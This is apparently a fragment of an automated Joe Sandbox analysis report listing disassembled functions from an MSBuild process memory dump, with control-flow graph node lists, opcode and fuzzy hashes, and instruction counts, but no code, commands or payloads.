                                              • Opcode ID: 6c06c8b5459dd7ae9bf69f9a50a9f8e16d20211a55f8f55615eb491287ef6d62
                                              • Instruction ID: 85df1608e7883168cb9036d7734382510585bdbd878907336e0db0dc90732839
                                              • Opcode Fuzzy Hash: 6c06c8b5459dd7ae9bf69f9a50a9f8e16d20211a55f8f55615eb491287ef6d62
                                              • Instruction Fuzzy Hash: 0F029370E0020ACFEBB4DB68D4946ADB7BAFB49350F24892AD815DB781D770DD81CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0690E440 Relevance: .4, Instructions: 392COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3656 690e440-690e45e 3657 690e460-690e463 3656->3657 3658 690e465-690e472 3657->3658 3659 690e477-690e47a 3657->3659 3658->3659 3660 690e480-690e483 3659->3660 3661 690e65d-690e666 3659->3661 3662 690e493-690e496 3660->3662 3663 690e485-690e48e 3660->3663 3664 690e4e8-690e4f1 3661->3664 3665 690e66c-690e676 3661->3665 3669 690e498-690e4b4 3662->3669 3670 690e4b9-690e4bc 3662->3670 3663->3662 3667 690e677-690e6ae 3664->3667 3668 690e4f7-690e4fb 3664->3668 3683 690e6b0-690e6b3 3667->3683 3671 690e500-690e503 3668->3671 3669->3670 3672 690e4c6-690e4c9 3670->3672 3673 690e4be-690e4c3 3670->3673 3674 690e514-690e516 3671->3674 3675 690e505-690e509 3671->3675 3677 690e4e3-690e4e6 3672->3677 3678 690e4cb-690e4de 3672->3678 3673->3672 3681 690e518 3674->3681 3682 690e51d-690e520 3674->3682 3675->3665 3680 690e50f 3675->3680 3677->3664 3677->3671 3678->3677 3680->3674 3681->3682 3682->3657 3684 690e526-690e54a 3682->3684 3687 690e6c0-690e6c3 3683->3687 3688 690e6b5-690e6b9 3683->3688 3708 690e550-690e55f 3684->3708 3709 690e65a 3684->3709 3691 690e6d0-690e6d3 3687->3691 3692 690e6c5-690e6cf 3687->3692 3689 690e711-690e74c 3688->3689 3690 690e6bb 3688->3690 3699 690e752-690e75e 3689->3699 3700 690e93f-690e952 3689->3700 3690->3687 3693 690e6e2-690e6e5 3691->3693 3694 690e6d5 call 690e9a7 3691->3694 3697 690e6e7-690e703 3693->3697 3698 690e708-690e70b 3693->3698 3701 690e6db-690e6dd 3694->3701 3697->3698 3698->3689 3703 690e974-690e976 3698->3703 3712 690e760-690e779 3699->3712 3713 690e77e-690e7c2 3699->3713 3704 690e954 3700->3704 3701->3693 3705 690e978 3703->3705 3706 690e97d-690e980 3703->3706 3704->3703 3705->3706 3706->3683 3711 690e986-690e990 3706->3711 3716 690e561-690e567 3708->3716 3717 690e577-690e5b2 call 6909d10 3708->3717 3709->3661 3712->3704 3730 690e7c4-690e7d6 3713->3730 3731 690e7de-690e81d 3713->3731 3718 690e569 3716->3718 3719 690e56b-690e56d 3716->3719 3733 690e5b4-690e5ba 3717->3733 3734 690e5ca-690e5e1 3717->3734 3718->3717 3719->3717 3730->3731 3740 690e823-690e8fe call 6909d10 3731->3740 3741 690e904-690e919 3731->3741 3737 690e5bc 3733->3737 3738 690e5be-690e5c0 3733->3738 3746 690e5e3-690e5e9 3734->3746 3747 690e5f9-690e60a 3734->3747 3737->3734 3738->3734 3740->3741 3741->3700 3749 690e5eb 3746->3749 3750 690e5ed-690e5ef 3746->3750 3753 690e622-690e653 3747->3753 3754 690e60c-690e612 3747->3754 3749->3747 3750->3747 3753->3709 3756 690e614 3754->3756 3757 690e616-690e618 3754->3757 3756->3753 3757->3753
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2d712c0351fec5b041b00a50d64f6926985da7ef938772983d9c08caf31dae0d
                                              • Instruction ID: 7e9e17e345163c5228897eeea6ad5383fd95bc6538c39090dca69a767934f2c8
                                              • Opcode Fuzzy Hash: 2d712c0351fec5b041b00a50d64f6926985da7ef938772983d9c08caf31dae0d
                                              • Instruction Fuzzy Hash: 30E18F30E1020A8FEF64DB69D4546AEB7B6FF88300F208929D516EB795EB70DC41CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06907640 Relevance: .3, Instructions: 254COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 4271 6907640-6907648 4272 690764a-690766e 4271->4272 4273 690768b-6907693 4271->4273 4274 6907670-6907673 4272->4274 4280 6907620-6907627 4273->4280 4281 6907694-69076a3 4273->4281 4275 6907675-6907681 4274->4275 4276 69076a8-69076ab 4274->4276 4275->4273 4278 69076e0-69076e3 4276->4278 4279 69076ac-69076c4 4276->4279 4283 6907711-6907714 4278->4283 4284 69076e5-690770a 4278->4284 4305 69076cc-69076db 4279->4305 4290 690762c-690762e 4280->4290 4281->4276 4287 6907716-6907742 4283->4287 4288 6907747-690774a 4283->4288 4298 6907772-6907797 4284->4298 4318 690770c 4284->4318 4287->4288 4291 690774c-6907768 4288->4291 4292 690776d-6907770 4288->4292 4294 6907630 4290->4294 4295 6907635-6907638 4290->4295 4291->4292 4297 69077a2-69077a5 4292->4297 4292->4298 4294->4295 4300 690763a-690763f 4295->4300 4301 69075bb-69075be 4295->4301 4302 69077c7-69077c9 4297->4302 4303 69077a7-69077c2 4297->4303 4298->4287 4330 690779d 4298->4330 4308 69075e0-69075e3 4301->4308 4309 69075c0-69075db 4301->4309 4306 69077d0-69077d3 4302->4306 4307 69077cb 4302->4307 4303->4302 4305->4278 4306->4274 4316 69077d9-69077e8 4306->4316 4307->4306 4312 69075e5-69075e7 4308->4312 4313 6907606-6907609 4308->4313 4309->4308 4369 69075ec call 6907640 4312->4369 4370 69075ec call 6907904 4312->4370 4313->4290 4319 690760b-690760d 4313->4319 4325 6907930-6907943 4316->4325 4326 69077ee-69077f4 4316->4326 4318->4283 4358 6907612 call 6907640 4319->4358 4359 6907612 call 6907904 4319->4359 4323 69075f2-6907601 4323->4313 4332 690794a 4325->4332 4360 69077f7 call 6907960 4326->4360 4361 69077f7 call 6907978 4326->4361 4329 6907618-690761e 4329->4280 4330->4297 4334 690794b 4332->4334 4333 69077fd-690782a 4338 6907830-6907839 4333->4338 4339 690791b-690792a 4333->4339 4334->4334 4340 6907945 4338->4340 4341 690783f-6907887 4338->4341 4339->4325 4339->4326 4340->4332 4346 6907909-6907915 4341->4346 4347 690788d-69078be call 6907df9 4341->4347 4346->4338 4346->4339 4363 69078c0 call 6907f10 4347->4363 4364 69078c0 call 6907f00 4347->4364 4352 69078c6-69078df 4365 69078e1 call 6908940 4352->4365 4366 69078e1 call 6908939 4352->4366 4354 69078e7-69078e9 4367 69078ec call 6909558 4354->4367 4368 69078ec call 6909548 4354->4368 4355 69078f2-69078f4 4355->4346 4356 69078f6-6907902 4355->4356 4356->4346 4358->4329 4359->4329 4360->4333 4361->4333 4363->4352 4364->4352 4365->4354 4366->4354 4367->4355 4368->4355 4369->4323 4370->4323
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 33608e3baab1b8345c3685a84099a86139d6d26f7d58003f71aacdb49aae4a36
                                              • Instruction ID: e96e7dc297957ebd1d38abbc865b8a56c809c6e91b74b72902f64d6d8e86e0b0
                                              • Opcode Fuzzy Hash: 33608e3baab1b8345c3685a84099a86139d6d26f7d58003f71aacdb49aae4a36
                                              • Instruction Fuzzy Hash: C8917030B1024A8FEB54DBB9D4547AEB7B6EF85350F248429D40ADF385EB74EC428B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0690C8C8 Relevance: .2, Instructions: 231COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ced1a2e6382f053569a827c93745cd7608326ec4d1bea72de6e52d9a7e1e50d3
                                              • Instruction ID: cb13ef91c702f8f21e5870b97a65ea855feabf1b087209173ee2f7938e79e71c
                                              • Opcode Fuzzy Hash: ced1a2e6382f053569a827c93745cd7608326ec4d1bea72de6e52d9a7e1e50d3
                                              • Instruction Fuzzy Hash: A1915430B0065A9FEB54DB79D8507AE73B6FF85340F108569C419EB788EB709C45CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06909558 Relevance: .2, Instructions: 229COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d806154ddfc8da257413b525b746d74e609cfada9106f5d133bd69c667fe480c
                                              • Instruction ID: 0fce3ebf1885235cbc5862bf679b5b9a2cef8d17612b148b3e5730c32896bdc1
                                              • Opcode Fuzzy Hash: d806154ddfc8da257413b525b746d74e609cfada9106f5d133bd69c667fe480c
                                              • Instruction Fuzzy Hash: 7E61D172F001224FDF549A7EC88055FBADBAFC4220B244439E80EDB3A5DE65EC0287C1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06907960 Relevance: .2, Instructions: 225COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 37c2b0fd29bffec226368d00314801f58f170d3c039b636ee6be66406295f214
                                              • Instruction ID: 76f842da1f67415badbac9a050716d31f1890513f30f425095a7407645b5ac64
                                              • Opcode Fuzzy Hash: 37c2b0fd29bffec226368d00314801f58f170d3c039b636ee6be66406295f214
                                              • Instruction Fuzzy Hash: F8914D30E1025A8FEF64DFA8C840B9DB7B1FF89314F208599D549AB291DB70AD85CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06909548 Relevance: .2, Instructions: 214COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d0f067c06246ee488ba39855d0b9d9f5c61e36252d477e27862ccd8cfe5ac8a0
                                              • Instruction ID: af5297eea74d66703a7938435d9f69a7f6067dd8a14e9aa33aebe1e08dc32792
                                              • Opcode Fuzzy Hash: d0f067c06246ee488ba39855d0b9d9f5c61e36252d477e27862ccd8cfe5ac8a0
                                              • Instruction Fuzzy Hash: 0751F372F001224FDB11DA7EC88455FBADBAFC4220B25407AE80EDB361DEA5ED0287D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06907978 Relevance: .2, Instructions: 210COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c3da622443aa6e22d20cf2d76f96f98062252dd604975f9e13854bba6558b4cd
                                              • Instruction ID: 521d5df9c7993370419e025f7e8acba1ab65d8c1501c0cca20b4180ba617c58c
                                              • Opcode Fuzzy Hash: c3da622443aa6e22d20cf2d76f96f98062252dd604975f9e13854bba6558b4cd
                                              • Instruction Fuzzy Hash: E1912E30E1061A8FDF64DFA8C880B9DB7B1FF89314F208599D549AB385DB70A985CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06907F10 Relevance: .2, Instructions: 186COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15568295284adf2adf41e2c3efdbde2bba37ecd817d84869d943edd1a0263dca
                                              • Instruction ID: 7c1e046d587f8e6d4841b716ea1f6e0d222a84005aa8a23678cae0d342d42507
                                              • Opcode Fuzzy Hash: 15568295284adf2adf41e2c3efdbde2bba37ecd817d84869d943edd1a0263dca
                                              • Instruction Fuzzy Hash: 57619C70F002199FEF949BA5C8147AEBBF6FF88340F20842AE116EB395DB754C458B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0690C8BE Relevance: .2, Instructions: 170COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 277710eebf0a038ec6bdf609e4ec18bde5295ada529d9d395dcd791a46847b1d
                                              • Instruction ID: 2e49917b36c4a562d31fbb834a2acaaa26f6939e134915901e7644af9c259f6f
                                              • Opcode Fuzzy Hash: 277710eebf0a038ec6bdf609e4ec18bde5295ada529d9d395dcd791a46847b1d
                                              • Instruction Fuzzy Hash: 26514130B0155A9FEB54DB78D8A0BAE73F6FF88640F148569C41ADB798EB70DC018B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 069087B8 Relevance: .1, Instructions: 136COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 01c3f3667b352446874009c502da2eaa921abbf5914619e34c4f4462d676c6c3
                                              • Instruction ID: c7ca5191b8f5dc04a917f15feb159db2481429f6e60cf616b51a685a1a7b7f49
                                              • Opcode Fuzzy Hash: 01c3f3667b352446874009c502da2eaa921abbf5914619e34c4f4462d676c6c3
                                              • Instruction Fuzzy Hash: D9417531F006099FDF70CE99D9806AFF7BAFB85310F20492AD656D7680D730A9558B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06907F00 Relevance: .1, Instructions: 132COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f0db5d5678ad4a9a2e5ecda7b40b94628eafd43a0ff12e6b0743da6d1802f098
                                              • Instruction ID: 3e646aefbf5a69825f64e97db2feef511dd65b8d6cab55ceb265a79995e6a0fc
                                              • Opcode Fuzzy Hash: f0db5d5678ad4a9a2e5ecda7b40b94628eafd43a0ff12e6b0743da6d1802f098
                                              • Instruction Fuzzy Hash: 9A418E70B102199FEB549BA5C814BAEBBF7FF88340F208529E116EB395DB749C05CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06905980 Relevance: .1, Instructions: 105COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8433ee75c3fdb66c0a99bb7eac6abfabe1e7352910dc3d936811af70a9ce7ffb
                                              • Instruction ID: 1e80d96a7439be145e480823de9f3a3cdf9e08e07be51499085626885c784517
                                              • Opcode Fuzzy Hash: 8433ee75c3fdb66c0a99bb7eac6abfabe1e7352910dc3d936811af70a9ce7ffb
                                              • Instruction Fuzzy Hash: 4E31AF30B002068FEB58AB35C55466F7BA7AB89750F64486CD416DB385EE35CC41CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06905830 Relevance: .1, Instructions: 97COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ad91a91a9b1d6b01f6b44d3628399ceb8a5552c36bbbbb346a007e7e3067e81e
                                              • Instruction ID: 166ae8c826d19b2454ee85b79a1e4dc7f42f9c0a4bec4adabe4441092210d1ce
                                              • Opcode Fuzzy Hash: ad91a91a9b1d6b01f6b44d3628399ceb8a5552c36bbbbb346a007e7e3067e81e
                                              • Instruction Fuzzy Hash: 3E315C70E1020A9FDB19DF64C99469EB7B6AF89310F208529E816E7780DB30AC42CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06905840 Relevance: .1, Instructions: 91COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b7be8f079f2dae598d695be543746cb52734a7acd43e555cd845069b8dde0e3b
                                              • Instruction ID: a2055ccd6edb5e9f8d2d8322afd2927611f199f4c689af0c91451d118e0ce615
                                              • Opcode Fuzzy Hash: b7be8f079f2dae598d695be543746cb52734a7acd43e555cd845069b8dde0e3b
                                              • Instruction Fuzzy Hash: 07315C30E1020A9FDB19DF64C99469EB7F6BF89300F208529E816E7790DB70AC42CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06907248 Relevance: .1, Instructions: 83COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e55a6f73b1c7c2d71d6a5d1dd13ac113bad7cfbc8c29ea8ac08ab97e4dd5efdd
                                              • Instruction ID: 3f03d0fe2a8876d94f31fc22ea90d3bbe38e8eadc0fd898da641c055fbdd80d1
                                              • Opcode Fuzzy Hash: e55a6f73b1c7c2d71d6a5d1dd13ac113bad7cfbc8c29ea8ac08ab97e4dd5efdd
                                              • Instruction Fuzzy Hash: 0F21B175F012199FEB40DFA8D940AAEB7F5AB48220F104029E915EB380E734EC418B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06907258 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 64d100283c18b64a31e727c739ccec9cb370b66e2ffedc2c482dea0d3f8d5f31
                                              • Instruction ID: 76769dd53e6a29a868f32588796be2bde2a3559534420f47704b1e955b8c65eb
                                              • Opcode Fuzzy Hash: 64d100283c18b64a31e727c739ccec9cb370b66e2ffedc2c482dea0d3f8d5f31
                                              • Instruction Fuzzy Hash: 21217C75F112199FEB50DFA9E950AAEB7F5AB48260F144029E915EB380E734E8418B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 069075A0 Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3724a22a38e071f99311e000dddc032479e723f5f8ddef7e494c6a3127a359f1
                                              • Instruction ID: e6cb6d7d485b532607761b72943e36e46be2191f2f5920cf6c810bce971d8ca3
                                              • Opcode Fuzzy Hash: 3724a22a38e071f99311e000dddc032479e723f5f8ddef7e494c6a3127a359f1
                                              • Instruction Fuzzy Hash: F11192317001151FEB6696BD981476BB7DADBC9620F24843AE10ACB791EA65EC0243E2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06907368 Relevance: .1, Instructions: 59COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a0a272955248b6674aef1c998a544c66dfcb0b909f40a2e534fa62898c7e9f76
                                              • Instruction ID: 68dd1ba9c68508483858c5c1eeed8b22661af9077aeb2a2f1924ad321bd5b433
                                              • Opcode Fuzzy Hash: a0a272955248b6674aef1c998a544c66dfcb0b909f40a2e534fa62898c7e9f76
                                              • Instruction Fuzzy Hash: 7211A532B101694FEB94A6A8D8146AE73EBABC8211B144539C906EB384DE74DC0187D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06907358 Relevance: .1, Instructions: 55COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fac41564ae1524ca01304ea1dc0796a592028bd9217a296f8c2e5d47281fc4c0
                                              • Instruction ID: 608e71d82b63ae4fc3fbe3c3a89f51bf6fe5b97aaf13cfa688687c3c67b89c69
                                              • Opcode Fuzzy Hash: fac41564ae1524ca01304ea1dc0796a592028bd9217a296f8c2e5d47281fc4c0
                                              • Instruction Fuzzy Hash: 1A012D36B111690FEF98A5A99C106EF76AFDBC8611F20413AD406DB784EE709C0647D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06907021 Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f327fbfba4939acd3dedc183388cfe079539f890aeb99bdd1b01b83d9a8dbf22
                                              • Instruction ID: 93f9a118a2e3408f1b3acda54940373909340ddd1258c3e6a4d41d409fa9230a
                                              • Opcode Fuzzy Hash: f327fbfba4939acd3dedc183388cfe079539f890aeb99bdd1b01b83d9a8dbf22
                                              • Instruction Fuzzy Hash: 6521F4B5D01259AFDB00CF9AD884BCEFBB4FB48724F10822AE518A7240C3756544CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06907028 Relevance: .1, Instructions: 52COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e333ca5db6b9a1a0ef88fa97b194d89d5c64b311d64b3a017fa4911936cebb6
                                              • Instruction ID: 9a15d736706972cd41cbe0b647f8de27f43fae5fb705649b090c6b8b24946388
                                              • Opcode Fuzzy Hash: 8e333ca5db6b9a1a0ef88fa97b194d89d5c64b311d64b3a017fa4911936cebb6
                                              • Instruction Fuzzy Hash: 1411D3B1D01259AFDB00CF9AD884ACEFBB4FB48724F10822AE918A7640C3756554CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 069075B0 Relevance: .1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 91b273e19c66038e9209e5d09d7dcfdd01f9183a85fe09cf9d658480c2063b05
                                              • Instruction ID: a44fd98e66cc0c99dab94cb357bcb08736f358f5e6de63585f712f0c803df561
                                              • Opcode Fuzzy Hash: 91b273e19c66038e9209e5d09d7dcfdd01f9183a85fe09cf9d658480c2063b05
                                              • Instruction Fuzzy Hash: 95016D31B001154FEB6596BE945472BB2DADBC9720F34883AE50BCB784EE61EC4243A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0690DA78 Relevance: .0, Instructions: 50COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b0f180033a5e3159c793f6ccb0c9552544fdea92c4dcf50c88b5e945f21192ae
                                              • Instruction ID: b7e2744a52f76b749dc5600f6f311ef5a9841185e58db1c121db48e0ea1e98d9
                                              • Opcode Fuzzy Hash: b0f180033a5e3159c793f6ccb0c9552544fdea92c4dcf50c88b5e945f21192ae
                                              • Instruction Fuzzy Hash: 0B01A230B041195FEB61EABCD56072A77DAEF89720F308839E50BC7794EA21EC068781
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0690DA88 Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ebc8c332ce74f749e63c28f64423ef4652d3715d90aed23546d5e2a5fe9d91b2
                                              • Instruction ID: 5fc5144107eeb239d07e1771ef1d4d0e32d7c327584b91e19f8b0094cd012053
                                              • Opcode Fuzzy Hash: ebc8c332ce74f749e63c28f64423ef4652d3715d90aed23546d5e2a5fe9d91b2
                                              • Instruction Fuzzy Hash: 88014434B105195FEB65EABDD56471B77DAEB89720F308838E10BC7794EE21DC068781
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0690BA37 Relevance: .0, Instructions: 31COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2166170733.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_6900000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f6eda253df5d7c95e61da779ef35451a4cec9ee622eaaf0a2e58c5ef01355393
                                              • Instruction ID: 8aa13c6bb029d76dbfac2df2c9ba4f2cbe0d0d4c15c370ccc97c2a34b44cc799
                                              • Opcode Fuzzy Hash: f6eda253df5d7c95e61da779ef35451a4cec9ee622eaaf0a2e58c5ef01355393
                                              • Instruction Fuzzy Hash: E0F05832A04218CFFB648A54E9942A877F9EB413A0F384862D800939D8E3329E82CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

